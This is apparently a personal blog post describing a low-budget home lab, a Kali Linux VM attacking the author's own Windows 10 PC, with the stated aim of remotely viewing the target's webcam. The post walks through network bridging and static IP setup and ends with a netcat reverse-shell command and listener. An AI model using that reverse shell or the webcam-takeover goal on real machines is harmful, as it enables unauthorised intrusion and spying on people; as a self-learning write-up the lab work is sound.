Due to lack of equipment and being on a very low budget, setting up a lab for penetration testing can be a challenge and this is what i have just encountered but I used to this kind of stuff but as I progressed, I am learning new things and want to document it each time I solve the challenge(I keep on challenging my self in order to learn new things).
My goal is to set up a lab wherein I can view the webcam of the target machine. My target machine is Windows 10 Pc and I will attack it from my virtualbox Kali Linux. I am still at the first stage wherein I have to set my equipments. So I browse the web for tutorial and on the side I learned that what I am trying to accomplish is not new and in 2014 a hacker used this idea and his victim was Ms Teen USA 2013, but eventually he was caught and was sentenced to life imprisonment. And also may I add that the Netflix Documentary about Snowden had a similar scene. The NSA can open a webcam anywhere in the world, that's what he is trying to tell the world.
This is just a personal challenge and its not new and probably all antiviruses will detect this. So the first thing I did was disabled my antiviruses and firewalls. The next step was a real challenge to me, because my Kali Linux must be on the same network with my target machine. I've had success establishing a reverse shell wherein the target machine was my Kali Linux running on VirtualBox and my attacking machine is my Windows 10 pc which is the opposite. This kept me busy the whole day.
These are the steps I did:
I created a bridged network linking my Wifi network connection and the Ethernet 2 (Virtualbox Host-only Ethernet Adapter). To do this, select the 2 network adaptors and right click then select "bridged network" from the context menu, and that's it.
Then on my Kali Linux Network Setting, I changed it to Host-Only Adapter and selected from the drop down the Virtualbox Host-only Ethernet Adapter
On my Kali Linux, I had to reconfigure my eth0 by modifying /etc/network/interfaces with vim by adding the following:
auto eth0
iface eth0 inet static
address 192.168.24.72/24
netmask 255.255.255.0
gateway 192.168.24.24
Next thing I did was I had to stop and start my eth0 interface by issuing the following commands:
sudo ifdown eth0
sudo ifup eth0
To initially test if the configuration is correct, I had to check the current ip address of my Kali Linux by typing "ifconfig" and i was able to confirm that the ip address is 192.168.24.72 indicating that it is on the same network as my target machine.
It can only be confirmed if I can establish a reverse shell by typing "ncat -nv 192.168.24.71 9090 -e cmd.exe"; on my Kali Linux, I had to type "nc -lvp 9090" and a reverse shell was created.
No comments:
Post a Comment